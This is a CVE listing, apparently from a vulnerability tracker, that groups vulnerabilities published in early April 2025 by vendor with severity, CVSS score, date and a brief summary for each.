CVE-2025-2807 | High | 8.8 | — | 2025-04-08 | The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary plugin installations due to a missing capability check in the mvl_setup_wizard_install_plugin() function in all versions up to, and in… |
CVE-2025-32654 | High | 8.1 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Stylemix Motors motors-car-dealership-classified-listings allows PHP Local File Inclusion. This issue affects Motors: f… |
CVE-2025-2128 | Medium | 6.5 | — | 2025-04-11 | The Cost Calculator Builder plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order_ids’ parameter in all versions up to, and including, 3.2.67 due to insufficient escaping on the user supplied parameter and lack of s… |
CVE-2025-2808 | Medium | 5.4 | — | 2025-04-08 | The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Phone Number parameter in all versions up to, and including, 1.4.63 due to insufficient input sanitization a… |
CVE-2025-3437 | Medium | 4.3 | — | 2025-04-08 | The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in the ajax_actions.php file in all versions up to, and… |
Zoom · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30671 | Medium | 6.5 | — | 2025-04-08 | Null pointer dereference in some Zoom Workplace Apps for Windows may allow an authenticated user to conduct a denial of service via network access. |
CVE-2025-30670 | Medium | 6.5 | — | 2025-04-08 | Null pointer dereference in some Zoom Workplace Apps for Windows may allow an authenticated user to conduct a denial of service via network access. |
CVE-2025-27442 | Medium | 4.6 | — | 2025-04-08 | Cross site scripting in some Zoom Workplace Apps may allow an unauthenticated user to cause a loss of integrity via adjacent network access. |
CVE-2025-27441 | Medium | 4.6 | — | 2025-04-08 | Cross site scripting in some Zoom Workplace Apps may allow an unauthenticated user to cause a loss of integrity via adjacent network access. |
CVE-2025-27443 | Low | 2.8 | — | 2025-04-08 | Insecure default variable initialization in some Zoom Workplace Apps for Windows may allow an authenticated user to cause a loss of integrity via local access. |
Apache · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30473 | High | 8.8 | — | 2025-04-07 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Airflow Common SQL Provider. |
CVE-2025-27391 | Medium | 6.5 | — | 2025-04-09 | Insertion of Sensitive Information into Log File vulnerability in Apache ActiveMQ Artemis. |
CVE-2025-30677 | Medium | 6.5 | — | 2025-04-09 | Apache Pulsar contains multiple connectors for integrating with Apache Kafka. |
CVE-2025-31672 | Medium | 5.3 | — | 2025-04-09 | Improper Input Validation vulnerability in Apache POI. |
Arubanetworks · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27083 | High | 7.2 | — | 2025-04-08 | Authenticated command injection vulnerabilities exist in the AOS-10 GW and AOS-8 Controller/Mobility Conductor web-based management interface. |
CVE-2025-27082 | High | 7.2 | — | 2025-04-08 | Arbitrary File Write vulnerabilities exist in the web-based management interface of both the AOS-10 GW and AOS-8 Controller/Mobility Conductor operating systems. |
CVE-2025-27084 | Medium | 5.4 | — | 2025-04-08 | A vulnerability in the Captive Portal of an AOS-10 GW and AOS-8 Controller/Mobility Conductor could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack. |
CVE-2025-27085 | Medium | 4.9 | — | 2025-04-08 | Multiple vulnerabilities exist in the web-based management interface of AOS-10 GW and AOS-8 Controller/Mobility Conductor. |
Fuzzoid · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3430 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'printer_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparat… |
CVE-2025-3429 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'material_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient prepara… |
CVE-2025-3428 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'coating_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparat… |
CVE-2025-3427 | Medium | 4.9 | — | 2025-04-08 | The 3DPrint Lite plugin for WordPress is vulnerable to SQL Injection via the 'infill_text' parameter in all versions up to, and including, 2.1.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparati… |
Hgiga · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3363 | Critical | 9.8 | — | 2025-04-08 | The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. |
CVE-2025-3362 | Critical | 9.8 | — | 2025-04-08 | The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. |
CVE-2025-3361 | Critical | 9.8 | — | 2025-04-08 | The web service of iSherlock from HGiga has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. |
CVE-2025-3364 | Medium | 6.7 | — | 2025-04-08 | The SSH service of PowerStation from HGiga has a Chroot Escape vulnerability, allowing attackers with root privileges to bypass chroot restrictions and access the entire file system. |
Ibm · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2023-43037 | Medium | 6.5 | — | 2025-04-10 | IBM Maximo Application Suite 8.11 and 9.0 could allow an authenticated user to perform unauthorized actions due to improper input validation. |
CVE-2023-33844 | Medium | 5.4 | — | 2025-04-09 | IBM Security Verify Governance 10.0.2 is vulnerable to cross-site scripting. |
CVE-2025-25023 | Medium | 4.9 | — | 2025-04-09 | IBM Security Guardium 11.4 and 12.1 could allow a privileged user to read any file on the system due to incorrect privilege assignment. |
CVE-2024-51461 | Medium | 4.3 | — | 2025-04-11 | IBM QRadar WinCollect Agent 10.0 through 10.1.13 could allow a remote attacker to cause a denial of service by interrupting an HTTP request that could consume memory resources. |
Mediatek · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20654 | Critical | 9.8 | — | 2025-04-07 | In wlan service, there is a possible out of bounds write due to an incorrect bounds check. |
CVE-2025-20664 | High | 7.5 | — | 2025-04-07 | In wlan AP driver, there is a possible information disclosure due to an uncaught exception. |
CVE-2025-20663 | High | 7.5 | — | 2025-04-07 | In wlan AP driver, there is a possible information disclosure due to an uncaught exception. |
CVE-2025-20659 | Medium | 6.5 | — | 2025-04-07 | In Modem, there is a possible system crash due to improper input validation. |
Ni · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2632 | High | 7.8 | — | 2025-04-09 | Out of bounds write vulnerability due to improper bounds checking in NI LabVIEW reading CPU info from cache that may result in information disclosure or arbitrary code execution. |
CVE-2025-2631 | High | 7.8 | — | 2025-04-09 | Out of bounds write vulnerability due to improper bounds checking in NI LabVIEW in InitCPUInformation() that may result in information disclosure or arbitrary code execution. |
CVE-2025-2630 | High | 7.3 | — | 2025-04-09 | There is a DLL hijacking vulnerability due to an uncontrolled search path that exists in NI LabVIEW. |
CVE-2025-2629 | High | 7.3 | — | 2025-04-09 | There is a DLL hijacking vulnerability due to an uncontrolled search path that exists in NI LabVIEW when loading NI Error Reporting. |
Nothings · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3409 | Medium | 6.3 | — | 2025-04-08 | A vulnerability classified as critical has been found in Nothings stb up to f056911. |
CVE-2025-3408 | Medium | 6.3 | — | 2025-04-08 | A vulnerability was found in Nothings stb up to f056911. |
CVE-2025-3407 | Medium | 6.3 | — | 2025-04-08 | A vulnerability was found in Nothings stb up to f056911. |
CVE-2025-3406 | Medium | 4.3 | — | 2025-04-08 | A vulnerability was found in Nothings stb up to f056911. |
Oisf · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29915 | High | 7.5 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
CVE-2025-29918 | Medium | 6.2 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
CVE-2025-29917 | Medium | 6.2 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
CVE-2025-29916 | Medium | 6.2 | — | 2025-04-10 | Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. |
Red Hat · 4 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2251 | Medium | 6.2 | — | 2025-04-07 | A security flaw exists in WildFly and JBoss Enterprise Application Platform (EAP) within the Enterprise JavaBeans (EJB) remote invocation mechanism. |
CVE-2025-3359 | Medium | 6.2 | — | 2025-04-07 | A flaw was found in GNUPlot. |
CVE-2025-3416 | Low | 3.7 | — | 2025-04-08 | A flaw was found in OpenSSL's handling of the properties argument in certain functions. |
CVE-2025-3360 | Low | 3.7 | — | 2025-04-07 | A flaw was found in GLib. |
Adonesevangelista · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3337 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3336 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
CVE-2025-3335 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in codeprojects Online Restaurant Management System 1.0. |
Aias · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3412 | Medium | 6.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, was found in mymagicpower AIAS 20250308. |
CVE-2025-3411 | Medium | 6.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, has been found in mymagicpower AIAS 20250308. |
CVE-2025-3410 | Medium | 6.3 | — | 2025-04-08 | A vulnerability classified as critical was found in mymagicpower AIAS 20250308. |
Amauri · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31475 | Medium | 5.5 | — | 2025-04-07 | tarteaucitron.js is a compliant and accessible cookie banner. |
CVE-2025-31138 | Medium | 5.5 | — | 2025-04-07 | tarteaucitron.js is a compliant and accessible cookie banner. |
CVE-2025-31476 | Medium | 4.8 | — | 2025-04-07 | tarteaucitron.js is a compliant and accessible cookie banner. |
Brizy · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32198 | Medium | 6.5 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themefusecom Brizy brizy. This issue affects Brizy: from n/a through <= 2.7.7. |
CVE-2025-26902 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Brizy Brizy Pro allows Cross Site Request Forgery. This issue affects Brizy Pro: from n/a through 2.6.1. |
CVE-2025-26901 | Medium | 4.3 | — | 2025-04-09 | Missing Authorization vulnerability in Brizy Brizy Pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Brizy Pro: from n/a through 2.6.1. |
Debian · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-13861 | High | 7.8 | — | 2025-04-11 | A code injection vulnerability in the Debian package component of Taegis Endpoint Agent (Linux) versions older than 1.3.10 allows local users arbitrary code execution as root. |
CVE-2025-29769 | Medium | 5.5 | — | 2025-04-07 | libvips is a demand-driven, horizontally threaded image processing library. |
CVE-2025-32728 | Medium | 4.3 | — | 2025-04-10 | In sshd in OpenSSH before 10.0, the DisableForwarding directive does not adhere to the documentation stating that it disables X11 and agent forwarding. |
Drupal · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3475 | Medium | 6.5 | — | 2025-04-09 | Allocation of Resources Without Limits or Throttling, Incorrect Authorization vulnerability in Drupal WEB-T allows Excessive Allocation, Content Spoofing. This issue affects WEB-T: from 0.0.0 before 1.1.0. |
CVE-2025-3474 | Medium | 6.5 | — | 2025-04-09 | Missing Authentication for Critical Function vulnerability in Drupal Panels allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Panels: from 0.0.0 before 4.9.0. |
CVE-2025-3131 | Medium | 5.4 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Drupal ECA: Event - Condition - Action allows Cross Site Request Forgery. This issue affects ECA: Event - Condition - Action: from 0.0.0 before 1.1.12, from 2.0.0 before 2.0.16, from 2.1.0… |
Esafenet · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3401 | High | 7.3 | — | 2025-04-08 | A vulnerability has been found in ESAFENET CDG 5.6.3.154.205_20250114 and classified as critical. |
CVE-2025-3400 | High | 7.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, was found in ESAFENET CDG 5.6.3.154.205_20250114. |
CVE-2025-3399 | High | 7.3 | — | 2025-04-08 | A vulnerability, which was classified as critical, has been found in ESAFENET CDG 5.6.3.154.205_20250114. |
Hive Support · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32242 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Hive Support Hive Support hive-support allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Hive Support: from n/a through <= 1.2.5. |
CVE-2025-32214 | Medium | 6.5 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hive Support Hive Support hive-support allows Stored XSS. This issue affects Hive Support: from n/a through <= 1.2.11. |
CVE-2025-32208 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Hive Support Hive Support hive-support allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hive Support: from n/a through <= 1.2.5. |
Iqonicdesign · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2526 | High | 8.8 | — | 2025-04-08 | The Streamit theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.0.2. |
CVE-2025-2525 | High | 8.8 | — | 2025-04-08 | The Streamit theme for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'st_Authentication_Controller::edit_profile' function in all versions up to, and including, 4.0.1. |
CVE-2025-2519 | Medium | 6.5 | — | 2025-04-08 | The Streamit theme for WordPress is vulnerable to arbitrary file downloads in all versions up to, and including, 4.0.1. |
Philips · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3426 | — | — | — | 2025-04-07 | We observed that IntelliSpace Portal binaries do not have any protection mechanisms to prevent reverse engineering. |
CVE-2025-3425 | — | — | — | 2025-04-07 | The IntelliSpace portal application utilizes .NET Remoting for its functionality. |
CVE-2025-3424 | — | — | — | 2025-04-07 | The IntelliSpace portal application utilizes .NET Remoting for its functionality. |
Pickplugins · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32144 | High | 8.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in PickPlugins Job Board Manager job-board-manager allows Object Injection. This issue affects Job Board Manager: from n/a through <= 2.1.61. |
CVE-2025-32143 | High | 8.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in PickPlugins Accordion accordions allows Object Injection. This issue affects Accordion: from n/a through <= 2.3.11. |
CVE-2025-32618 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PickPlugins Wishlist wishlist allows SQL Injection. This issue affects Wishlist: from n/a through <= 1.0.46. |
Shopware · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-30151 | High | 7.5 | — | 2025-04-08 | Shopware is an open commerce platform. |
CVE-2025-32378 | Medium | 5.3 | — | 2025-04-09 | Shopware is an open source e-commerce software platform. |
CVE-2025-30150 | Medium | 5.3 | — | 2025-04-08 | Shopware 6 is an open commerce platform based on Symfony Framework and Vue. |
Sonicwall · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-23010 | High | 7.2 | — | 2025-04-10 | An Improper Link Resolution Before File Access ('Link Following') vulnerability in SonicWall NetExtender Windows (32 and 64 bit) client which allows an attacker to manipulate file paths. |
CVE-2025-23009 | High | 7.2 | — | 2025-04-10 | A local privilege escalation vulnerability in SonicWall NetExtender Windows (32 and 64 bit) client which allows an attacker to trigger an arbitrary file deletion. |
CVE-2025-23008 | High | 7.2 | — | 2025-04-10 | An improper privilege management vulnerability in the SonicWall NetExtender Windows (32 and 64 bit) client allows a low privileged attacker to modify configurations. |
Wpeverest · 3 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3439 | Critical | 9.8 | — | 2025-04-11 | The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.1.1 via deserialization of untrusted input f… |
CVE-2025-3421 | Medium | 6.1 | — | 2025-04-11 | The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'form_id' parameter in all versions up to, and including, 3.1.1 du… |
CVE-2025-3422 | Medium | 5.4 | — | 2025-04-11 | The Everest Forms – Contact Form, Quiz, Survey, Newsletter & Payment Form Builder for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.1.1. |
Ability, Inc · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32650 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ability, Inc Accessibility Suite online-accessibility allows SQL Injection. This issue affects Accessibility Suite: from n/a through <= 4… |
CVE-2025-32215 | Medium | 6.5 | — | 2025-04-10 | Unrestricted Upload of File with Dangerous Type vulnerability in Ability, Inc Accessibility Suite online-accessibility allows Stored XSS. This issue affects Accessibility Suite: from n/a through <= 4.18. |
Ashan Perera · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32614 | High | 8.8 | — | 2025-04-11 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ashan Perera EventON eventon-lite allows PHP Local File Inclusion. This issue affects EventON: from n/a through <= 2.4. |
CVE-2025-32160 | High | 7.5 | — | 2025-04-10 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Ashan Perera EventON eventon-lite. This issue affects EventON: from n/a through <= 2.4.1. |
Axis · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0361 | Medium | 4.3 | — | 2025-04-08 | During an annual penetration test conducted on behalf of Axis Communications, Truesec discovered a flaw in the VAPIX Device Configuration framework that allowed for unauthenticated username enumeration through the VAPIX Device Configuratio… |
CVE-2024-47261 | Medium | 4.3 | — | 2025-04-08 | 51l3nc3, a member of the AXIS OS Bug Bounty Program, has found that the VAPIX API uploadoverlayimage.cgi did not have sufficient input validation, allowing an attacker to upload files to block access to create image overlays in the web inte… |
Bep · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32025 | — | — | — | 2025-04-08 | bep/imagemeta is a Go library for reading EXIF, IPTC and XMP image meta data from JPEG, TIFF, PNG, and WebP files. |
CVE-2025-32024 | — | — | — | 2025-04-08 | bep/imagemeta is a Go library for reading EXIF, IPTC and XMP image meta data from JPEG, TIFF, PNG, and WebP files. |
Blubrry · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32690 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in blubrry PowerPress Podcasting powerpress allows DOM-Based XSS. This issue affects PowerPress Podcasting: from n/a through <= 11.12.5. |
CVE-2025-32691 | Medium | 4.9 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in blubrry PowerPress Podcasting powerpress allows Server Side Request Forgery. This issue affects PowerPress Podcasting: from n/a through <= 11.12.6. |
Bogdan Bendziukov · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31002 | Critical | 9.1 | — | 2025-04-09 | Unrestricted Upload of File with Dangerous Type vulnerability in Bogdan Bendziukov Squeeze squeeze allows Using Malicious Files. This issue affects Squeeze: from n/a through <= 1.6. |
CVE-2025-31003 | Low | 2.7 | — | 2025-04-09 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Bogdan Bendziukov Squeeze squeeze allows Retrieve Embedded Sensitive Data. This issue affects Squeeze: from n/a through <= 1.6. |
Codeastro · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-29017 | High | 8.8 | — | 2025-04-10 | A Remote Code Execution (RCE) vulnerability exists in Code Astro Internet Banking System 2.0.0 due to improper file upload validation in the profile_pic parameter within pages_view_client.php. |
CVE-2025-29018 | Medium | 4.8 | — | 2025-04-09 | A Stored Cross-Site Scripting (XSS) vulnerability exists in the name parameter of pages_add_acc_type.php in Code Astro Internet Banking System 2.0.0. |
Dev02ali · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32567 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows SQL Injection. This issue affects Easy Post Duplicator: from n/a through <= 1.0… |
CVE-2025-32538 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows Reflected XSS. This issue affects Easy Post Duplicator: from n/a through <= 1.0… |
Helm · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32387 | Medium | 6.5 | — | 2025-04-09 | Helm is a package manager for Charts for Kubernetes. |
CVE-2025-32386 | Medium | 6.5 | — | 2025-04-09 | Helm is a tool for managing Charts. |
Hewlett Packard Enterprise (Hpe) · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27078 | Medium | 6.5 | — | 2025-04-08 | A vulnerability in a system binary of AOS-8 Instant and AOS-10 AP could allow an authenticated remote attacker to inject commands into the underlying operating system while using the CLI. |
CVE-2025-27079 | Medium | 6.0 | — | 2025-04-08 | A vulnerability in the file creation process on the command line interface of AOS-8 Instant and AOS-10 AP could allow an authenticated remote attacker to perform remote code execution (RCE). |
Iteaj · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3327 | Low | 3.5 | — | 2025-04-07 | A vulnerability was found in iteaj iboot IoT Gateway (物联网网关) 1.1.3 and classified as problematic. |
CVE-2025-3326 | Low | 3.5 | — | 2025-04-07 | A vulnerability has been found in iteaj iboot IoT Gateway (物联网网关) 1.1.3 and classified as problematic. |
Jenkins · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32755 | Critical | 9.1 | — | 2025-04-10 | In jenkins/ssh-slave Docker images based on Debian, SSH host keys are generated on image creation for images based on Debian, causing all containers based on images of the same version to use the same SSH host keys, allowing attackers able to… |
CVE-2025-32754 | Critical | 9.1 | — | 2025-04-10 | In jenkins/ssh-agent Docker images 6.11.1 and earlier, SSH host keys are generated on image creation for images based on Debian, causing all containers based on images of the same version to use the same SSH host keys, allowing attackers able… |
Joe · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32495 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joe Waymark waymark allows Stored XSS. This issue affects Waymark: from n/a through <= 1.5.3. |
CVE-2025-32487 | Medium | 4.9 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in Joe Waymark waymark allows Server Side Request Forgery. This issue affects Waymark: from n/a through <= 1.5.2. |
Joomla · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-25226 | Critical | 9.8 | — | 2025-04-08 | Improper handling of identifiers leads to a SQL injection vulnerability in the quoteNameStr method of the database package. |
CVE-2025-25227 | High | 7.5 | — | 2025-04-08 | Insufficient state checks lead to a vector that allows 2FA checks to be bypassed. |
Linzhaoguan · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3386 | Low | 2.4 | — | 2025-04-07 | A vulnerability was found in LinZhaoguan pb-cms 2.0. |
CVE-2025-3385 | Low | 2.4 | — | 2025-04-07 | A vulnerability was found in LinZhaoguan pb-cms 2.0. |
Magepeopleteam · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32607 | Critical | 9.8 | — | 2025-04-11 | Deserialization of Untrusted Data vulnerability in magepeopleteam WpBookingly service-booking-manager allows Object Injection. This issue affects WpBookingly: from n/a through <= 1.3.0. |
CVE-2025-32145 | High | 8.8 | — | 2025-04-10 | Deserialization of Untrusted Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Object Injection. This issue affects WpEvently: from n/a through <= 4.3.6. |
Magnigenie · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32687 | High | 8.5 | — | 2025-04-10 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magnigenie Review Stars Count For WooCommerce review-stars-count-for-woocommerce allows SQL Injection. This issue affects Review Stars Cou… |
CVE-2025-32553 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Magnigenie RestroPress restropress allows Reflected XSS. This issue affects RestroPress: from n/a through <= 3.2.8.4. |
Msi · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27813 | High | 8.1 | — | 2025-04-10 | MSI Center before 2.0.52.0 has Missing PE Signature Validation. |
CVE-2025-27812 | High | 8.1 | — | 2025-04-10 | MSI Center before 2.0.52.0 allows TOCTOU Local Privilege Escalation. |
Ngothang · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-6860 | Medium | 4.3 | — | 2025-04-09 | The WP MultiTasking WordPress plugin through 0.1.12 does not have a CSRF check when updating its permalink suffix settings, which could allow attackers to make logged-in admins perform such an action via a CSRF attack. |
CVE-2024-6857 | Medium | 4.3 | — | 2025-04-09 | The WP MultiTasking WordPress plugin through 0.1.12 does not have a CSRF check when updating its Header, Footer and Body Script Settings, which could allow attackers to make logged-in admins perform such an action via a CSRF attack. |
Open, Inc. · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31932 | High | 8.8 | — | 2025-04-11 | Deserialization of untrusted data issue exists in BizRobo! |
CVE-2025-31362 | Low | 3.7 | — | 2025-04-11 | Use of hard-coded cryptographic key issue exists in BizRobo! |
Otwthemes · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32115 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Popping Content Light popping-content-light allows Reflected XSS. This issue affects Popping Content Light: from n/a through <=… |
CVE-2025-32117 | High | 7.1 | — | 2025-04-08 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Widgetize Pages Light widgetize-pages-light allows Reflected XSS. This issue affects Widgetize Pages Light: from n/a through <=… |
Quantumcloud · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32675 | Medium | 6.8 | — | 2025-04-09 | Server-Side Request Forgery (SSRF) vulnerability in QuantumCloud SEO Help seo-help allows Server Side Request Forgery. This issue affects SEO Help: from n/a through <= 6.7.9. |
CVE-2025-32244 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in QuantumCloud SEO Help seo-help allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SEO Help: from n/a through <= 6.7.9. |
Romancode · 2 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32683 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RomanCode MapSVG mapsvg-lite-interactive-vector-maps allows DOM-Based XSS. This issue affects MapSVG: from n/a through <= 8.6.6. |
